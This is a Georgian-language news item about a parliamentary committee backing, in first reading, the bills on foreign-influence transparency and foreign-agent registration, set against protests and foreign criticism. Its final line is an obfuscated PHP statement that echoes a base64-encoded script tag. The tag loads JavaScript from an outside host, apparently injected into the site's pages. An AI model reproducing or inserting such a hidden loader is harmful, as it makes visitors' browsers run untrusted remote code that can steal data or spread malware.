celsiusi
ავერსი საქკაბელი
საქართველოს პარლამენტის იურიდიულ საკითხთა კომიტეტმა „ხალხის ძალის“ მიერ ინიცირებული „უცხოური გავლენის გამჭვირვალობის შესახებ“ და „უცხოელი აგენტების რეგისტრაციის შესახებ“ კანონპროექტებს პირველი მოსმენით მხარი დაუჭირა.
კომიტეტის ხელმძღვანელის ანრი ოხანაშვილის განცხადებით, ორივე კანონპროექტი გაიგზავნება ვენეციის კომისიაში და იქიდან მოსული რეკომენდაციების მიხედვით გაგრძელდება მათზე მუშაობა.
ცნობისთვის, "ხალხის ძალამ" პარლამენტში ორი კვირის შუალედში დაარეგისტრირა ორი კანონპროექტი უცხოური გავლენის აგენტების გამჭვირვალობის თაობაზე. კანონპროექტის მიღების შემთხვევაში იმ მედიასაშუალებებსა და ორგანიზაციებს, რომლებიც დაფინანსების 20%-ზე მეტს უცხოური ორგანიზაციებისგან, მათ შორის საერთაშორისო დონორებისგან იღებენ, მოუწევთ დარეგისტრირდნენ, როგორც უცხოური გავლენის აგენტები.
კანონპროექტების განხილვა დღეს დილიდან ხმაურის ფონზე მიმდინარეობდა. პარალელურად, პარლამენტთან საპროტესტო აქცია იმართებოდა.
ევროკავშირი, აშშ, გაერო, საქართველოს არასამთავრობო სექტორი და საზოგადოების სხვადასხვა ჯგუფები მოუწოდებდნენ დეპუტატებს არ მიეღოთ აღნიშნული კანონპროექტი. 
269
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");